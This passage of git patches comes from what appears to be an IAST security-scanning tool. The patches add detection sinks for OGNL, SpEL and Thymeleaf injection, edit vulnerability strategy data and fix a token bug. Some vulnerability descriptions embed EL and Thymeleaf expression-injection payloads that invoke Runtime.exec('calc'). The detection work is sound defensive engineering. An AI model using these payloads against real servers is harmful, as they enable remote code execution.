"ognl.Ognl.getValue(java.lang.String,java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "ognl.Ognl.getValue(java.lang.String,java.lang.Object,java.lang.Class)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "ognl.Ognl.getValue(java.lang.String,java.util.Map,java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "ognl.Ognl.getValue(java.lang.String,java.util.Map,java.lang.Object,java.lang.Class)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "ognl.Ognl.parseExpression(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.apache.commons.ognl.Ognl.parseExpression(java.lang.String)" + } + ], + "enable": 1, + "type": 4, + "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" + }, { "details": [ { @@ -508,6 +834,169 @@ "type": 1, "value": "RequestFacade" }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.springframework.expression.Expression.getValue()" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.springframework.expression.Expression.getValue(java.lang.Class)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.springframework.expression.Expression.getValue(java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.springframework.expression.Expression.getValue(java.lang.Object,java.lang.Class)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Class)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Object,java.lang.Class)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.springframework.expression.Expression.getValueTypeDescriptor()" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.springframework.expression.Expression.getValueTypeDescriptor(java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.springframework.expression.Expression.getValueTypeDescriptor(org.springframework.expression.EvaluationContext)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.springframework.expression.Expression.getValueTypeDescriptor(org.springframework.expression.EvaluationContext,java.lang.Object)" + } + ], + "enable": 1, + "type": 4, + "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" + }, { "details": [ { @@ -2555,6 +3044,39 @@ "type": 2, "value": "Struts2" }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.thymeleaf.standard.expression.Expression.parse(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.thymeleaf.standard.expression.IStandardExpressionParser.parseExpression(org.thymeleaf.context.IExpressionContext,java.lang.String)" + } + ], + "enable": 1, + "type": 4, + "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" + }, { "details": [ { diff --git a/static/data/vul_strategy.json b/static/data/vul_strategy.json index a1dd376af..702d3095b 100644 --- a/static/data/vul_strategy.json +++ b/static/data/vul_strategy.json @@ -2,7 +2,7 @@ { "level": 1, "state": "enable", - "system_type": 0, + "system_type": 1, "user": 1, "vul_desc": "CWE-917\uff0c\u8be5\u8f6f\u4ef6\u4f7f\u7528\u6765\u81ea\u4e0a\u6e38\u7ec4\u4ef6\u7684\u5916\u90e8\u5f71\u54cd\u7684\u8f93\u5165\u6765\u6784\u9020Java Server Page\uff08JSP\uff09\u4e2d\u7684\u5168\u90e8\u6216\u90e8\u5206\u8868\u8fbe\u8bed\u8a00\uff08EL\uff09\u8bed\u53e5\uff0c\u4f46\u4e0d\u4f1a\u4e2d\u548c\u6216\u9519\u8bef\u5730\u4e2d\u548c\u4e86\u53ef\u4ee5\u4fee\u6539\u9884\u671f\u7684EL\u8bed\u53e5\u7684\u7279\u6b8a\u5143\u7d20\u3002\u5b83\u88ab\u6267\u884c\u3002\n\nEL\uff08Expression Language\uff09 \u662f\u4e3a\u4e86\u4f7fJSP\u5199\u8d77\u6765\u66f4\u52a0\u7b80\u5355\u3002\u8868\u8fbe\u5f0f\u8bed\u8a00\u7684\u7075\u611f\u6765\u81ea\u4e8e ECMAScript \u548c XPath \u8868\u8fbe\u5f0f\u8bed\u8a00\uff0c\u5b83\u63d0\u4f9b\u4e86\u5728 JSP \u4e2d\u7b80\u5316\u8868\u8fbe\u5f0f\u7684\u65b9\u6cd5\uff0c\u8ba9Jsp\u7684\u4ee3\u7801\u66f4\u52a0\u7b80\u5316\u3002\n\nEL\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e\u548cSpEL\u3001OGNL\u7b49\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e\u662f\u4e00\u6837\u7684\u6f0f\u6d1e\u539f\u7406\u7684\uff0c\u5373\u8868\u8fbe\u5f0f\u5916\u90e8\u53ef\u63a7\u5bfc\u81f4\u653b\u51fb\u8005\u6ce8\u5165\u6076\u610f\u8868\u8fbe\u5f0f\u5b9e\u73b0\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\n\n\u4e00\u822c\u6765\u8bf4\uff0cEL\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e\u7684\u5916\u90e8\u53ef\u63a7\u70b9\u5165\u53e3\u90fd\u662f\u5728Java\u7a0b\u5e8f\u4ee3\u7801\u4e2d\uff0c\u5373Java\u7a0b\u5e8f\u4e2d\u7684EL\u8868\u8fbe\u5f0f\u5185\u5bb9\u5168\u90e8\u6216\u90e8\u5206\u662f\u4ece\u5916\u90e8\u83b7\u53d6\u7684\u3002\n\n**\u901a\u7528POC**\n\n```Java\n//\u5bf9\u5e94\u4e8eJSP\u9875\u9762\u4e2d\u7684pageContext\u5bf9\u8c61\uff08\u6ce8\u610f\uff1a\u53d6\u7684\u662fpageContext\u5bf9\u8c61\uff09\n${pageContext}\n\n//\u83b7\u53d6Web\u8def\u5f84\n${pageContext.getSession().getServletContext().getClassLoader().getResource(\"\")}\n\n//\u6587\u4ef6\u5934\u53c2\u6570\n${header}\n\n//\u83b7\u53d6webRoot\n${applicationScope}\n\n//\u6267\u884c\u547d\u4ee4\n${pageContext.request.getSession().setAttribute(\"a\",pageContext.request.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec(\"calc\").getInputStream())}\n```", "vul_desc_en": null, @@ -50,7 +50,7 @@ { "level": 1, "state": "enable", - "system_type": 0, + "system_type": 1, "user": 1, "vul_desc": "\u5168\u79f0Object Graph Navigation Library\nOGNL\u4ee3\u8868\u5bf9\u8c61\u56fe\u5bfc\u822a\u8bed\u8a00\uff1b\u5b83\u662f\u4e00\u79cd\u8868\u8fbe\u8bed\u8a00\uff0c\u7528\u4e8e\u83b7\u53d6\u548c\u8bbe\u7f6eJava\u5bf9\u8c61\u7684\u5c5e\u6027\uff0c\u4ee5\u53ca\u5176\u4ed6\u9644\u52a0\u529f\u80fd\uff0c\u4f8b\u5982\u5217\u8868\u6295\u5f71\u548c\u9009\u62e9\u4ee5\u53calambda\u8868\u8fbe\u5f0f\u3002\u60a8\u53ef\u4ee5\u4f7f\u7528\u76f8\u540c\u7684\u8868\u8fbe\u5f0f\u6765\u83b7\u53d6\u548c\u8bbe\u7f6e\u5c5e\u6027\u503c\u3002", "vul_desc_en": null, @@ -146,7 +146,7 @@ { "level": 1, "state": "enable", - "system_type": 0, + "system_type": 1, "user": 1, "vul_desc": "Spring Expression Language\uff08\u7b80\u79f0SpEL\uff09\u662f\u4e00\u79cd\u5f3a\u5927\u7684\u8868\u8fbe\u5f0f\u8bed\u8a00\uff0c\u652f\u6301\u5728\u8fd0\u884c\u65f6\u67e5\u8be2\u548c\u64cd\u4f5c\u5bf9\u8c61\u56fe\u3002\u8bed\u8a00\u8bed\u6cd5\u7c7b\u4f3c\u4e8eUnified EL\uff0c\u4f46\u63d0\u4f9b\u4e86\u989d\u5916\u7684\u529f\u80fd\uff0c\u7279\u522b\u662f\u65b9\u6cd5\u8c03\u7528\u548c\u57fa\u672c\u7684\u5b57\u7b26\u4e32\u6a21\u677f\u529f\u80fd\u3002\u540c\u65f6\u56e0\u4e3aSpEL\u662f\u4ee5API\u63a5\u53e3\u7684\u5f62\u5f0f\u521b\u5efa\u7684\uff0c\u6240\u4ee5\u5141\u8bb8\u5c06\u5176\u96c6\u6210\u5230\u5176\u4ed6\u5e94\u7528\u7a0b\u5e8f\u548c\u6846\u67b6\u4e2d\u3002\n", "vul_desc_en": null, @@ -162,7 +162,7 @@ { "level": 1, "state": "enable", - "system_type": 0, + "system_type": 1, "user": 1, "vul_desc": "Thymeleaf \u662f\u4e0e java \u914d\u5408\u4f7f\u7528\u7684\u4e00\u6b3e\u670d\u52a1\u7aef\u6a21\u677f\u5f15\u64ce\uff0c\u4e5f\u662f spring \u5b98\u65b9\u652f\u6301\u7684\u4e00\u6b3e\u670d\u52a1\u7aef\u6a21\u677f\u5f15\u64ce\u3002\u4ed6\u652f\u6301 HTML \u539f\u578b\uff0c\u5728 HTML \u6807\u7b7e\u4e2d\u589e\u52a0\u989d\u5916\u7684\u5c5e\u6027\u6765\u8fbe\u5230\u6a21\u677f + \u6570\u636e\u7684\u5c55\u793a\u65b9\u5f0f\u3002\u9ed8\u8ba4\u524d\u7f00\uff1a/templates/ \uff0c\u9ed8\u8ba4\u540e\u7f00\uff1a.html \n- Thymeleaf\u4f7f\u7528html\u901a\u8fc7\u4e00\u4e9b\u7279\u5b9a\u6807\u7b7e\u8bed\u6cd5\u4ee3\u8868\u5176\u542b\u4e49\uff0c\u4f46\u5e76\u672a\u7834\u574fhtml\u7ed3\u6784\uff0c\u5373\u4f7f\u65e0\u7f51\u7edc\u3001\u4e0d\u901a\u8fc7\u540e\u7aef\u6e32\u67d3\u4e5f\u80fd\u5728\u6d4f\u89c8\u5668\u6210\u529f\u6253\u5f00\uff0c\u5927\u5927\u65b9\u4fbf\u754c\u9762\u7684\u6d4b\u8bd5\u548c\u4fee\u6539\u3002\n- Thymeleaf\u63d0\u4f9b\u6807\u51c6\u548cSpring\u6807\u51c6\u4e24\u79cd\u65b9\u8a00\uff0c\u53ef\u4ee5\u76f4\u63a5\u5957\u7528\u6a21\u677f\u5b9e\u73b0JSTL\u3001 OGNL\u8868\u8fbe\u5f0f\u6548\u679c\uff0c\u907f\u514d\u6bcf\u5929\u5957\u6a21\u677f\u3001\u6539JSTL\u3001\u6539\u6807\u7b7e\u7684\u56f0\u6270\u3002\u540c\u65f6\u5f00\u53d1\u4eba\u5458\u4e5f\u53ef\u4ee5\u6269\u5c55\u548c\u521b\u5efa\u81ea\u5b9a\u4e49\u7684\u65b9\u8a00\u3002\n- Springboot\u5b98\u65b9\u5927\u529b\u63a8\u8350\u548c\u652f\u6301\uff0cSpringboot\u5b98\u65b9\u505a\u4e86\u5f88\u591a\u9ed8\u8ba4\u914d\u7f6e\uff0c\u5f00\u53d1\u8005\u53ea\u9700\u7f16\u5199\u5bf9\u5e94html\u5373\u53ef\uff0c\u5927\u5927\u51cf\u8f7b\u4e86\u4e0a\u624b\u96be\u5ea6\u548c\u914d\u7f6e\u590d\u6742\u5ea6\u3002\n\nThymeleaf\u652f\u6301\u8868\u8fbe\u5f0f\u8bed\u6cd5\uff0c\u5982\u679c\u6a21\u7248\u53c2\u6570\u5916\u90e8\u8def\u7531\u4f20\u5165\uff0c\u7528\u6237\u53ef\u63a7\uff0c\u53ef\u80fd\u4f1a\u5bfc\u81f4\u6076\u610f\u653b\u51fb\u8005\u83b7\u53d6\u670d\u52a1\u5668\u7cfb\u7edf\u6743\u9650\u7b49\u3002\nThymeleaf \u63d0\u4f9b\u4e86\u00a0[\u9884\u5904\u7406](https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#preprocessing)\u00a0\u8868\u8fbe\u5f0f\u7684\u529f\u80fd\uff0c\u9884\u5904\u7406\u8868\u8fbe\u5f0f\u4e0e\u666e\u901a\u8868\u8fbe\u5f0f\u5b8c\u5168\u4e00\u6837\uff0c\u4f46\u7531\u53cc\u4e0b\u5212\u7ebf\u7b26\u53f7\u5305\u56f4\uff0c\u5982`__${expression}__`\u00a0\uff0c\u88ab\u9884\u5904\u7406\u7684\u8868\u8fbe\u5f0f\u5c06\u4f1a\u88ab\u63d0\u524d\u6267\u884c\uff0c\u5e76\u4e14\u53ef\u4ee5\u8fd4\u56de\u5f53\u4f5c\u5916\u5c42\u5305\u88f9\u7684\u540e\u7eed\u8868\u8fbe\u5f0f\u7684\u4e00\u90e8\u5206\uff0c\u4f8b\u5982\uff1a`#{selection.__${sel.code}__}`\uff0cThymeleaf \u9996\u5148\u8fdb\u884c\u9884\u5904\u7406`${sel.code}`\u3002\u7136\u540e\uff0c\u5b83\u4f7f\u7528\u7ed3\u679c\uff08\u5728\u672c\u4f8b\u4e2d\u4e3a\u5b58\u50a8\u503c\u00a0_ALL_\u00a0\uff09\u4f5c\u4e3a\u7a0d\u540e\u8ba1\u7b97\u7684\u5b9e\u6570\u8868\u8fbe\u5f0f (\u00a0`#{selection.ALL}`) \u7684\u4e00\u90e8\u5206\u3002\nPayload\u5982\u4e0b\n\u901a\u8fc7${}::.x\u6784\u9020\u8868\u8fbe\u5f0f\u4f1a\u7531Thymeleaf\u53bb\u6267\u884c\n```java\n__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__::.x\n```\n", "vul_desc_en": null, From 50996f7a904d42dd564d737d08590d639ada8a20 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Fri, 15 Sep 2023 17:05:04 +0800 Subject: [PATCH 113/114] feat: update new strategy. --- static/data/go_hooktype.json | 88 -------------------------------- static/data/java_hooktype.json | 88 -------------------------------- static/data/php_hooktype.json | 88 -------------------------------- static/data/python_hooktype.json | 88 -------------------------------- 4 files changed, 352 deletions(-) diff --git a/static/data/go_hooktype.json b/static/data/go_hooktype.json index 6db3d6ddd..6d432a170 100644 --- a/static/data/go_hooktype.json +++ b/static/data/go_hooktype.json @@ -1,26 +1,4 @@ [ - { - "created_by": 1, - "enable": 1, - "language": 4, - "name": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 3, - "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 4, - "name": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 4, - "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, { "created_by": 1, "enable": 1, @@ -87,72 +65,6 @@ "type": 3, "value": "JNDI\u6ce8\u5165" }, - { - "created_by": 1, - "enable": 1, - "language": 4, - "name": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 3, - "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 4, - "name": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 4, - "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 4, - "name": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 3, - "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 4, - "name": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 4, - "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 4, - "name": "Thymeleaf\u6a21\u7248\u6ce8\u5165", - "name_en": null, - "name_zh": "Thymeleaf\u6a21\u7248\u6ce8\u5165", - "system_type": 0, - "type": 3, - "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 4, - "name": "Thymeleaf\u6a21\u7248\u6ce8\u5165", - "name_en": null, - "name_zh": "Thymeleaf\u6a21\u7248\u6ce8\u5165", - "system_type": 0, - "type": 4, - "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" - }, { "created_by": 1, "enable": 1, diff --git a/static/data/java_hooktype.json b/static/data/java_hooktype.json index 41496c9b2..b7c62ec15 100644 --- a/static/data/java_hooktype.json +++ b/static/data/java_hooktype.json @@ -43,28 +43,6 @@ "type": 1, "value": "Cookie" }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 3, - "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 4, - "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, { "created_by": 1, "enable": 1, @@ -230,28 +208,6 @@ "type": 1, "value": "Mybatis\u4f20\u64ad" }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 3, - "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 4, - "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, { "created_by": 1, "enable": 1, @@ -318,28 +274,6 @@ "type": 1, "value": "RequestFacade" }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 3, - "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 4, - "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, { "created_by": 1, "enable": 1, @@ -428,28 +362,6 @@ "type": 2, "value": "Struts2" }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "Thymeleaf\u6a21\u7248\u6ce8\u5165", - "name_en": null, - "name_zh": "Thymeleaf\u6a21\u7248\u6ce8\u5165", - "system_type": 0, - "type": 3, - "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "Thymeleaf\u6a21\u7248\u6ce8\u5165", - "name_en": null, - "name_zh": "Thymeleaf\u6a21\u7248\u6ce8\u5165", - "system_type": 0, - "type": 4, - "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" - }, { "created_by": 1, "enable": 1, diff --git a/static/data/php_hooktype.json b/static/data/php_hooktype.json index ad2716c3e..89a0ad7ce 100644 --- a/static/data/php_hooktype.json +++ b/static/data/php_hooktype.json @@ -1,26 +1,4 @@ [ - { - "created_by": 1, - "enable": 1, - "language": 3, - "name": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 3, - "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 3, - "name": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 4, - "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, { "created_by": 1, "enable": 1, @@ -76,72 +54,6 @@ "type": 2, "value": "GET" }, - { - "created_by": 1, - "enable": 1, - "language": 3, - "name": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 3, - "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 3, - "name": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 4, - "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 3, - "name": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 3, - "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 3, - "name": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 4, - "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 3, - "name": "Thymeleaf\u6a21\u7248\u6ce8\u5165", - "name_en": null, - "name_zh": "Thymeleaf\u6a21\u7248\u6ce8\u5165", - "system_type": 0, - "type": 3, - "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 3, - "name": "Thymeleaf\u6a21\u7248\u6ce8\u5165", - "name_en": null, - "name_zh": "Thymeleaf\u6a21\u7248\u6ce8\u5165", - "system_type": 0, - "type": 4, - "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" - }, { "created_by": 1, "enable": 1, diff --git a/static/data/python_hooktype.json b/static/data/python_hooktype.json index 68ec1d6ff..88607430c 100644 --- a/static/data/python_hooktype.json +++ b/static/data/python_hooktype.json @@ -1,26 +1,4 @@ [ - { - "created_by": 1, - "enable": 1, - "language": 2, - "name": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 3, - "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 2, - "name": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 4, - "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, { "created_by": 1, "enable": 1, @@ -65,72 +43,6 @@ "type": 3, "value": "FileWrite" }, - { - "created_by": 1, - "enable": 1, - "language": 2, - "name": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 3, - "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 2, - "name": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 4, - "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 2, - "name": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 3, - "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 2, - "name": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "name_en": null, - "name_zh": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", - "system_type": 0, - "type": 4, - "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 2, - "name": "Thymeleaf\u6a21\u7248\u6ce8\u5165", - "name_en": null, - "name_zh": "Thymeleaf\u6a21\u7248\u6ce8\u5165", - "system_type": 0, - "type": 3, - "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" - }, - { - "created_by": 1, - "enable": 1, - "language": 2, - "name": "Thymeleaf\u6a21\u7248\u6ce8\u5165", - "name_en": null, - "name_zh": "Thymeleaf\u6a21\u7248\u6ce8\u5165", - "system_type": 0, - "type": 4, - "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" - }, { "created_by": 1, "enable": 1, From 5af7bfc9902762b5157947abf7b380c67814b05c Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Fri, 15 Sep 2023 17:29:21 +0800 Subject: [PATCH 114/114] feat: update new strategy. --- dongtai_protocol/views/agent_download.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dongtai_protocol/views/agent_download.py b/dongtai_protocol/views/agent_download.py index 12f2132cb..43e727002 100644 --- a/dongtai_protocol/views/agent_download.py +++ b/dongtai_protocol/views/agent_download.py @@ -343,7 +343,7 @@ def get(self, request): if department_token: final_token = department_token elif request.user.using_project is not None: - token = request.user.using_project.token + final_token = request.user.using_project.token elif not user_token: token, success = Token.objects.get_or_create(user=request.user) final_token = token.key